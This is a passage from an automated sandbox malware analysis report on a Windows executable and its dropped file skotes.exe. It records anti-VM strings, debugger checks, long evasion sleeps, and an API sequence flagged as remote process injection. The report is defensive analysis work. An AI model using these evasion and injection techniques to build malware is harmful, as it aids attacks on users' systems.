Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Thread delayed: delay time: 180000

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Window / User API: threadDelayed 1430

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	API coverage: 2.8 %
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API coverage: 1.6 %
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API coverage: 6.2 %

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4916	Thread sleep count: 1430 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4916	Thread sleep time: -42900000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4428	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4916	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0043DC0D FindFirstFileExW,	0_2_0043DC0D
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0235DE74 FindFirstFileExW,	0_2_0235DE74
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_0043DC0D FindFirstFileExW,	21_2_0043DC0D
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020DDE74 FindFirstFileExW,	21_2_020DDE74
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_0043DC0D FindFirstFileExW,	32_2_0043DC0D
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021CDE74 FindFirstFileExW,	32_2_021CDE74

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

Code function: 0_2_00407D30 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

0_2_00407D30

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000

Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_f8ef4cd7629ba1b8065383a211c32b655eb30e9_92367cbf_0ee9c536-c995-43ff-92ed-ceaea6261b42\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_739d586cc05ff593cef168b7ca7bd46426c9c3_92367cbf_474a8dae-3ccd-43ed-ac57-4df3917c0b2b\

Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: skotes.exe, 00000020.00000002.2708227505.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000020.00000002.2708227505.0000000000830000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: p3aYwXKO5T.exe, 00000000.00000002.1687442209.0000000004420000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\6
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: skotes.exe, 00000020.00000002.2708227505.0000000000830000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW[R=
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

Code function: 0_2_00436AAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00436AAE

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

Code function: 0_2_0042BF99 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0042BF99

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0043A302 mov eax, dword ptr fs:[00000030h]	0_2_0043A302
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0043652B mov eax, dword ptr fs:[00000030h]	0_2_0043652B
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0079F9B3 push dword ptr fs:[00000030h]	0_2_0079F9B3
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_02356792 mov eax, dword ptr fs:[00000030h]	0_2_02356792
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0235A569 mov eax, dword ptr fs:[00000030h]	0_2_0235A569
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0232092B mov eax, dword ptr fs:[00000030h]	0_2_0232092B
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_02320D90 mov eax, dword ptr fs:[00000030h]	0_2_02320D90
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_0043A302 mov eax, dword ptr fs:[00000030h]	21_2_0043A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_0043652B mov eax, dword ptr fs:[00000030h]	21_2_0043652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_005ACDCB push dword ptr fs:[00000030h]	21_2_005ACDCB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020D6792 mov eax, dword ptr fs:[00000030h]	21_2_020D6792
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020DA569 mov eax, dword ptr fs:[00000030h]	21_2_020DA569
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020A092B mov eax, dword ptr fs:[00000030h]	21_2_020A092B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020A0D90 mov eax, dword ptr fs:[00000030h]	21_2_020A0D90
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_0043A302 mov eax, dword ptr fs:[00000030h]	32_2_0043A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_0043652B mov eax, dword ptr fs:[00000030h]	32_2_0043652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_007A055B push dword ptr fs:[00000030h]	32_2_007A055B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021C6792 mov eax, dword ptr fs:[00000030h]	32_2_021C6792
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021CA569 mov eax, dword ptr fs:[00000030h]	32_2_021CA569
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_0219092B mov eax, dword ptr fs:[00000030h]	32_2_0219092B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_02190D90 mov eax, dword ptr fs:[00000030h]	32_2_02190D90

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 32_2_0043EE63 GetProcessHeap,

32_2_0043EE63

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0041D1E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0041D1E7
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_00436AAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00436AAE
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0041DBA5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041DBA5
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0041DD0A SetUnhandledExceptionFilter,	0_2_0041DD0A
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0233D44E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0233D44E
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0233DE0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0233DE0C
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_02356D15 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_02356D15
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_0041D1E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_0041D1E7
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00436AAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_00436AAE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_0041DBA5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_0041DBA5
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_0041DD0A SetUnhandledExceptionFilter,	21_2_0041DD0A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020BD44E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_020BD44E
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020BDE0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_020BDE0C
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020D6D15 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_020D6D15
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00436AAE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_00436AAE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_0041D1E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	32_2_0041D1E7
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_0041DBA5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_0041DBA5
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_0041DD0A SetUnhandledExceptionFilter,	32_2_0041DD0A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021AD44E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	32_2_021AD44E
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021ADE0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_021ADE0C
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021C6D15 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_021C6D15

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

Code function: 0_2_004070A0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,

0_2_004070A0

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 432 -ip 432

Jump to behavior

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

Code function: 0_2_0041DD91 cpuid

0_2_0041DD91

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

